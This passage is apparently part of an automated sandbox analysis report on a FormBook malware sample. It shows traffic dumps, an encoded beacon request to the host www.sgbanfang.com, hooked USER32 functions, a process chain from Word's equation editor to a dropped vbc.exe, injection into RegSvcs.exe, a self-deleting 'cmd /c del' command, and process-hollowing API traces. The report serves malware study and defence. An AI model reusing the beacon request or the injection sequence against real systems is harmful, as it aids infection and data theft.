                                                                                                                                                      Data Ascii: IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfF
                                                                                                                                                      Nov 20, 2020 20:06:00.436364889 CET757INData Raw: 4f 72 56 30 52 49 71 2f 36 2b 42 49 50 50 56 56 4c 72 62 41 56 41 75 6c 51 4b 49 77 41 4f 2f 39 6a 55 4b 79 4a 6b 35 31 53 6d 4f 35 77 77 68 70 48 58 61 63 30 45 33 45 51 45 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34
                                                                                                                                                      Data Ascii: OrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMX
                                                                                                                                                      Nov 20, 2020 20:06:00.436414003 CET758INData Raw: 50 54 54 74 39 47 51 41 36 68 2b 64 2f 31 64 45 35 41 6e 39 47 52 48 35 6f 35 6d 77 49 67 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45
                                                                                                                                                      Data Ascii: PTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua
                                                                                                                                                      Nov 20, 2020 20:06:00.436458111 CET759INData Raw: 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69
                                                                                                                                                      Data Ascii: </div> <section class="additional-info"> <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/se


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 146.148.194.209 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 20:06:20.968894005 CET | 760 | OUT | GET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1
                                                                                                                                                      Host: www.sgbanfang.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:
Nov 20, 2020 20:06:21.133157969 CET | 760 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Fri, 20 Nov 2020 19:06:21 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 146
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                      Code Manipulations

                                                                                                                                                      User Modules

                                                                                                                                                      Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                                                                                                                      Processes

                                                                                                                                                      Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE7
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE7
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE7
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE7


                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:42
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                      Imagebase:0x13f770000
                                                                                                                                                      File size:1424032 bytes
                                                                                                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:43
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:46
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0xcb0000
                                                                                                                                                      File size:711168 bytes
                                                                                                                                                      MD5 hash:BB30A5DD4130B071FB4CA5F005371C63
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2105488822.00000000021A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 35%, ReversingLabs
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:48
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                      File size:45216 bytes
                                                                                                                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:48
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                      File size:45216 bytes
                                                                                                                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      General

                                                                                                                                                      Start time:20:04:50
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:
                                                                                                                                                      Imagebase:0xffca0000
                                                                                                                                                      File size:3229696 bytes
                                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      General

                                                                                                                                                      Start time:20:05:05
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:20:05:07
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                      Imagebase:0xb30000
                                                                                                                                                      File size:77312 bytes
                                                                                                                                                      MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      General

                                                                                                                                                      Start time:20:05:11
                                                                                                                                                      Start date:20/11/2020
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                                                                                                      Imagebase:0x4a5a0000
                                                                                                                                                      File size:302592 bytes
                                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                        Executed Functions

                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0487E48F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                        • String ID: \tc$\tc$\tc
                                                                                                                                                        • API String ID: 963392458-2165942276
                                                                                                                                                        APIs
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0487DE83
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                        APIs
                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0487DFEA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0487DD0A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                        APIs
                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 0487DB27
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                        APIs
                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 0487D9D6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: -
                                                                                                                                                        • API String ID: 0-2547889144
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: &
                                                                                                                                                        • API String ID: 0-1010288
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: E5
                                                                                                                                                        • API String ID: 0-1066200063
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ,
                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: .
                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9509b5fb39a7363ee504d2e10b7abce05bb7f3df7cba96c0db16a827b2960f8a
                                                                                                                                                        • Instruction ID: a165221cf70fe2b77a3ad31477c8625f09da30aa175441194b455ca389f5dc30
                                                                                                                                                        • Opcode Fuzzy Hash: 9509b5fb39a7363ee504d2e10b7abce05bb7f3df7cba96c0db16a827b2960f8a
                                                                                                                                                        • Instruction Fuzzy Hash: 0A718D70901208CFDB29DFA8E949E9CBBF1FB08305F58D469D8169B365DB309984CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0215ada254c147f5a48663a0cc3f443e700a4975c8563c237e517d014617eaea
                                                                                                                                                        • Instruction ID: 58e52966489651e3fed5a537a0ed03c5776ce7f88622f50321cb9f56b3c79950
                                                                                                                                                        • Opcode Fuzzy Hash: 0215ada254c147f5a48663a0cc3f443e700a4975c8563c237e517d014617eaea
                                                                                                                                                        • Instruction Fuzzy Hash: EB618F70901208CFD729DFA4E949E9CBBF5FB08305F58D469D8469B265DB309D84CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c6169315f4cb313820870bba7949f3fbe3d130e979f9ff74813a139b78eb7129
                                                                                                                                                        • Instruction ID: 09ebbf2a1be8f99c54538be53af7596c32a4457d8eb7b4630e4c92ef18b758c8
                                                                                                                                                        • Opcode Fuzzy Hash: c6169315f4cb313820870bba7949f3fbe3d130e979f9ff74813a139b78eb7129
                                                                                                                                                        • Instruction Fuzzy Hash: 1B617D70901208CFDB25DFA4E949EACBBF2FB08305F5494A9D84A97365DB309D84CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c67995ccff06ef1d17d67cc07246315cd520ab55840b05b423413f3f3177d913
                                                                                                                                                        • Instruction ID: 8c5576b72c54c24e7eb984870cd01289318153fd5d1a15b3ade7bca48a0b4cf3
                                                                                                                                                        • Opcode Fuzzy Hash: c67995ccff06ef1d17d67cc07246315cd520ab55840b05b423413f3f3177d913
                                                                                                                                                        • Instruction Fuzzy Hash: 0D616D70901208CFDB25DFA4E849E9CBBF5FB08306F549469D8569B364DB349D84CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b4c01d90f1a335994cfd8b0064d51d49ce1610cdaace9f6635d3ffa97cfa72be
                                                                                                                                                        • Instruction ID: 639e5b89dc6faf65647f57d72cf3374036e86ff5cee23264643217eef885d968
                                                                                                                                                        • Opcode Fuzzy Hash: b4c01d90f1a335994cfd8b0064d51d49ce1610cdaace9f6635d3ffa97cfa72be
                                                                                                                                                        • Instruction Fuzzy Hash: 0A619C70901208CFCB29DFA4E949EACBBF1FB08306F589469D8069B364DB309984CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 630213ca71f2949c74120a6d74b0f541ee0cddfb5b925920cd444706a5bd14f8
                                                                                                                                                        • Instruction ID: ffbb2f1816327e90c2a51c3ad47a9358ff2a423804da905be6dd444f9b554a4f
                                                                                                                                                        • Opcode Fuzzy Hash: 630213ca71f2949c74120a6d74b0f541ee0cddfb5b925920cd444706a5bd14f8
                                                                                                                                                        • Instruction Fuzzy Hash: A3618E70901208CFDB29DFA4E949EACBBF5FB08306F58D469D8469B265DB309D84CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8c0eeee2944223f8374620972a64373bb50de50830568292e0e5b4f486861e8e
                                                                                                                                                        • Instruction ID: e50a0411bed1ebba05c7d1a5b72df7f03ec39194cb065c24c3dd675ec88b453f
                                                                                                                                                        • Opcode Fuzzy Hash: 8c0eeee2944223f8374620972a64373bb50de50830568292e0e5b4f486861e8e
                                                                                                                                                        • Instruction Fuzzy Hash: 74619C70901208CFDB25DFA4E949EACBBF1FB08306F54D469D8069B364DB309984CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e279bbc3dd7244ada1a633a93bf3859393e34ce62759116621748952d0ab1e25
                                                                                                                                                        • Instruction ID: c0698196564ecd0dd8e1035ee1fef37fb1a91cd96e3fddc46eefa1a5e745693e
                                                                                                                                                        • Opcode Fuzzy Hash: e279bbc3dd7244ada1a633a93bf3859393e34ce62759116621748952d0ab1e25
                                                                                                                                                        • Instruction Fuzzy Hash: 94518C70901308CFDB29DFA4E949EACBBF5FB09306F54D469D8469B264DB309984CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4d85b2155811d651aa88912ccde94e7d399a5671ed957aeee3f0bb910637e161
                                                                                                                                                        • Instruction ID: 64d9787c03d52d0219116811db23ab668f3464427c3911cd4f569ccd74d0006e
                                                                                                                                                        • Opcode Fuzzy Hash: 4d85b2155811d651aa88912ccde94e7d399a5671ed957aeee3f0bb910637e161
                                                                                                                                                        • Instruction Fuzzy Hash: 18518C70901208CFDB29DFA4E949EACBBF5FB08306F549469D8469B364DB309984CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
